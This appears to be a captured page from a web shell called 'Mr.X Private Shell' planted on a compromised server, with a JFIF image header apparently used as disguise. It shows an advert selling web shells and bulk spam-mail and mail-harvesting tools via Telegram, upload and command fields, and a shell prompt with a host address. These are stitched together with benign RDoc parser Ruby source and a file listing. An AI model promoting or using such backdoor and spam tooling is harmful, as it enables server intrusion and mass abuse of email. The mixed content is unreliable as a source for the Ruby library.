����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.216.24: ~ $
# frozen_string_literal: true
##
# Parse a non-source file. We basically take the whole thing as one big
# comment.

class RDoc::Parser::Simple < RDoc::Parser

  include RDoc::Parser::Text

  parse_files_matching(//)

  attr_reader :content # :nodoc:

  ##
  # Prepare to parse a plain file

  def initialize(top_level, content, options, stats)
    super

    preprocess = RDoc::Markup::PreProcess.new @file_name, @options.rdoc_include

    content = RDoc::Text.expand_tabs(@content)
    @content, = preprocess.run_pre_processes(content, @top_level, 1, :simple)
  end

  ##
  # Extract the file contents and attach them to the TopLevel as a comment

  def scan
    content = remove_coding_comment @content

    comment = RDoc::Comment.new content, @top_level

    @top_level.comment = comment
    @top_level
  end

  ##
  # Removes the encoding magic comment from +text+

  def remove_coding_comment(text)
    text.sub(/\A# .*coding[=:].*$/, '')
  end
end

Filemanager

Name Type Size Permission Actions
c.rb File 35.46 KB 0644
changelog.rb File 8.71 KB 0644
markdown.rb File 472 B 0644
prism_ruby.rb File 38.2 KB 0644
rd.rb File 437 B 0644
ripper_state_lex.rb File 8 KB 0644
ruby.rb File 59.88 KB 0644
ruby_tools.rb File 2.58 KB 0644
simple.rb File 956 B 0644
text.rb File 306 B 0644